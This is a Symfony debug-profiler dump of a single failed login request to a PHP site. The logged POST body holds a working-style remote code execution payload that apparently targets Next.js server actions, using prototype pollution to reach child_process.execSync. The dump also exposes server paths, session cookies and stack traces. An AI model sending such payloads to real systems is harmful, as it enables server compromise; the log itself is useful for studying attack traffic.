Redirect 302 redirect from GET @app_home (f51900)

POST https://www.aksamassurancesgdocs.com/login

Request / Response

Request

GET Parameters

No GET parameters

POST Parameters

Key Value
0
"{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}"
1
""$@0""
2
"[]"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_access_control_attributes
[
  "PUBLIC_ACCESS"
]
_controller
"App\Controller\SecurityController::login"
_firewall_context
"security.firewall.map.context.main"
_redirected
true
_route
"app_login"
_route_params
[]
_security_firewall_run
"_security_main"
_security_remember_me_cookie
Symfony\Component\HttpFoundation\Cookie {#789
  #expire: 1
  #path: "/"
  -sameSite: "lax"
  -secureDefault: false
  #name: "REMEMBERME"
  #value: null
  #domain: null
  #secure: true
  #httpOnly: true
  -raw: false
  -partitioned: false
}
_stopwatch_token
"264131"

Request Headers

Header Value
accept
"*/*"
accept-encoding
"gzip, deflate"
content-length
"748"
content-type
"multipart/form-data; boundary=--------WebKitFormBoundary0152c24414474347"
cookie
"PHPSESSID=54f1c1af22975ce1a1f2edb0a3a4e597; main_deauth_profile_token=f51900; sf_redirect=%7B%22token%22%3A%22f51900%22%2C%22route%22%3A%22app_home%22%2C%22method%22%3A%22GET%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CHomeController%22%2C%22method%22%3A%22index%22%2C%22file%22%3A%22%5C%2Fhome%5C%2Fassuifaj%5C%2Faksamassurancesgdocs.com%5C%2Fsrc%5C%2FController%5C%2FHomeController.php%22%2C%22line%22%3A12%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
host
"www.aksamassurancesgdocs.com"
next-action
"x"
user-agent
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
x-forwarded-for
"13.53.192.211"
x-forwarded-proto
"https"
x-https
"on"
x-nextjs-request-id
"6e6f6d6b"
x-php-ob-level
"1"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-type
"text/html; charset=utf-8"
date
"Tue, 17 Mar 2026 08:50:50 GMT"
location
"/login"
set-cookie
"REMEMBERME=deleted; expires=Mon, 17 Mar 2025 08:50:49 GMT; Max-Age=0; path=/; secure; httponly; samesite=lax"
x-debug-token
"bab229"

Cookies

Request Cookies

Key Value
PHPSESSID
"54f1c1af22975ce1a1f2edb0a3a4e597"
main_deauth_profile_token
"f51900"
sf_redirect
"{"token":"f51900","route":"app_home","method":"GET","controller":{"class":"App\\Controller\\HomeController","method":"index","file":"\/home\/assuifaj\/aksamassurancesgdocs.com\/src\/Controller\/HomeController.php","line":12},"status_code":302,"status_text":"Found"}"

Response Cookies

Key Value
REMEMBERME
Symfony\Component\HttpFoundation\Cookie {#789
  #expire: 1
  #path: "/"
  -sameSite: "lax"
  -secureDefault: false
  #name: "REMEMBERME"
  #value: null
  #domain: null
  #secure: true
  #httpOnly: true
  -raw: false
  -partitioned: false
}

Session 4

Session Metadata

Key Value
Created
"Tue, 17 Mar 26 08:50:50 +0000"
Last used
"Tue, 17 Mar 26 08:50:50 +0000"
Lifetime
0

Session Attributes

Attribute Value
_security.last_error
Symfony\Component\Security\Core\Exception\InvalidCsrfTokenException {#780
  #message: "Invalid CSRF token."
  #code: 0
  #file: "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/EventListener/CsrfProtectionListener.php"
  #line: 49
  -token: null
  trace: {
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/EventListener/CsrfProtectionListener.php:49 {
      Symfony\Component\Security\Http\EventListener\CsrfProtectionListener->checkPassport(CheckPassportEvent $event): void …
      › if (false === $this->csrfTokenManager->isTokenValid($csrfToken)) {    throw new InvalidCsrfTokenException('Invalid CSRF token.');}
    }
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:115 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › try {    ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {
    }
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/EventDispatcher.php:206 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event): void …
      ›     }    $listener($event, $eventName, $this);}
    }
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/EventDispatcher.php:56 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
    }
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:126 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
    }
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:189 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->executeAuthenticator(AuthenticatorInterface $authenticator, Request $request): Response …
      › $event = new CheckPassportEvent($authenticator, $passport);$this->eventDispatcher->dispatch($event);}
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:167 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->executeAuthenticators(array $authenticators, Request $request): Response …
      › 
      › $response = $this->executeAuthenticator($authenticator, $request);if (null !== $response) {
    }
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:149 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->authenticateRequest(Request $request): Response …
      › 
      ›     return $this->executeAuthenticators($authenticators, $request);}
    }
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php:38 {
      Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener->authenticate(RequestEvent $event): void …
      › $request = $event->getRequest();$response = $this->authenticatorManager->authenticateRequest($request);if (null === $response) {
    }
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php:58 {
      Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener->authenticate(RequestEvent $event): void …
      › {    $this->authenticationManagerListener->authenticate($event);}
    }
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php:46 {
      Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener->authenticate(RequestEvent $event): void …
      › try {    $this->listener->authenticate($event);} catch (LazyResponseException $e) {
    }
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-bundle/Security/LazyFirewallContext.php:70 {
      Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext->authenticate(RequestEvent $event): void …
      › foreach ($listeners as $listener) {    $listener($event);}
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php:94 {
      Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener->callListeners(RequestEvent $event, iterable $listeners): void …
      › } elseif (false !== $listener->supports($event->getRequest())) {    $listener->authenticate($event);}
    }
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Firewall.php:93 {
      Symfony\Component\Security\Http\Firewall->onKernelRequest(RequestEvent $event) …
      › 
      ›     $this->callListeners($event, $authenticationListeners());}
    }
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:115 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › try {    ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {
    }
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/EventDispatcher.php:206 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event): void …
      ›     }    $listener($event, $eventName, $this);}
    }
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/EventDispatcher.php:56 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
    }
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:126 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
    }
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/http-kernel/HttpKernel.php:159 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);}
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/http-kernel/HttpKernel.php:76 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $response = $this->handleRaw($request, $type);} catch (\Throwable $e) {
    }
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/http-kernel/Kernel.php:193 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
    }
    /home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35 {
      Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run(): int …
      › {    $response = $this->kernel->handle($this->request);}
    /home/assuifaj/aksamassurancesgdocs.com/vendor/autoload_runtime.php:32 {
      require_once …
      ›         ->getRunner($app)        ->run());
    }
    /home/assuifaj/aksamassurancesgdocs.com/index.php:5 {
      › 
      › require_once dirname(__DIR__).'/aksamassurancesgdocs.com/vendor/autoload_runtime.php';arguments: {
        "/home/assuifaj/aksamassurancesgdocs.com/vendor/autoload_runtime.php"
      }
    }
  }
}
_security.last_username
""
_security.main.target_path
"https://www.aksamassurancesgdocs.com/"

Session Usage

4 Usages
Stateless check enabled
Usage
Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage:39
[
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-core/Authentication/Token/Storage/UsageTrackingTokenStorage.php"
    "line" => 39
    "function" => "getMetadataBag"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 181
    "function" => "getToken"
    "class" => "Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 167
    "function" => "executeAuthenticator"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 149
    "function" => "executeAuthenticators"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 38
    "function" => "authenticateRequest"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 58
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 46
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
    "line" => 70
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 94
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Firewall.php"
    "line" => 93
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 115
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 206
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 126
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 159
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 76
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/http-kernel/Kernel.php"
    "line" => 193
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/autoload_runtime.php"
    "line" => 32
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/index.php"
    "line" => 5
    "args" => [
      "/home/assuifaj/aksamassurancesgdocs.com/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]
App\Security\LoginFormAuthenticator:33
[
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/src/Security/LoginFormAuthenticator.php"
    "line" => 33
    "function" => "set"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticator.php"
    "line" => 74
    "function" => "authenticate"
    "class" => "App\Security\LoginFormAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 185
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 167
    "function" => "executeAuthenticator"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 149
    "function" => "executeAuthenticators"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 38
    "function" => "authenticateRequest"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 58
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 46
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
    "line" => 70
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 94
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Firewall.php"
    "line" => 93
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 115
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 206
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 126
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 159
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 76
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/http-kernel/Kernel.php"
    "line" => 193
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/autoload_runtime.php"
    "line" => 32
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/index.php"
    "line" => 5
    "args" => [
      "/home/assuifaj/aksamassurancesgdocs.com/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]
Symfony\Component\Security\Csrf\TokenStorage\SessionTokenStorage:73
[
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-csrf/TokenStorage/SessionTokenStorage.php"
    "line" => 73
    "function" => "has"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-csrf/CsrfTokenManager.php"
    "line" => 98
    "function" => "hasToken"
    "class" => "Symfony\Component\Security\Csrf\TokenStorage\SessionTokenStorage"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/EventListener/CsrfProtectionListener.php"
    "line" => 48
    "function" => "isTokenValid"
    "class" => "Symfony\Component\Security\Csrf\CsrfTokenManager"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 115
    "function" => "checkPassport"
    "class" => "Symfony\Component\Security\Http\EventListener\CsrfProtectionListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 206
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 126
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 189
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 167
    "function" => "executeAuthenticator"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 149
    "function" => "executeAuthenticators"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 38
    "function" => "authenticateRequest"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 58
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 46
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
    "line" => 70
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 94
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Firewall.php"
    "line" => 93
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 115
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 206
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 126
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 159
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 76
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/http-kernel/Kernel.php"
    "line" => 193
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/autoload_runtime.php"
    "line" => 32
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/index.php"
    "line" => 5
    "args" => [
      "/home/assuifaj/aksamassurancesgdocs.com/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]
Symfony\Component\Security\Http\Authenticator\AbstractLoginFormAuthenticator:51
[
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authenticator/AbstractLoginFormAuthenticator.php"
    "line" => 51
    "function" => "set"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticator.php"
    "line" => 102
    "function" => "onAuthenticationFailure"
    "class" => "Symfony\Component\Security\Http\Authenticator\AbstractLoginFormAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 268
    "function" => "onAuthenticationFailure"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 221
    "function" => "handleAuthenticationFailure"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 167
    "function" => "executeAuthenticator"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/assuifaj/aksamassurancesgdocs.com/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 149
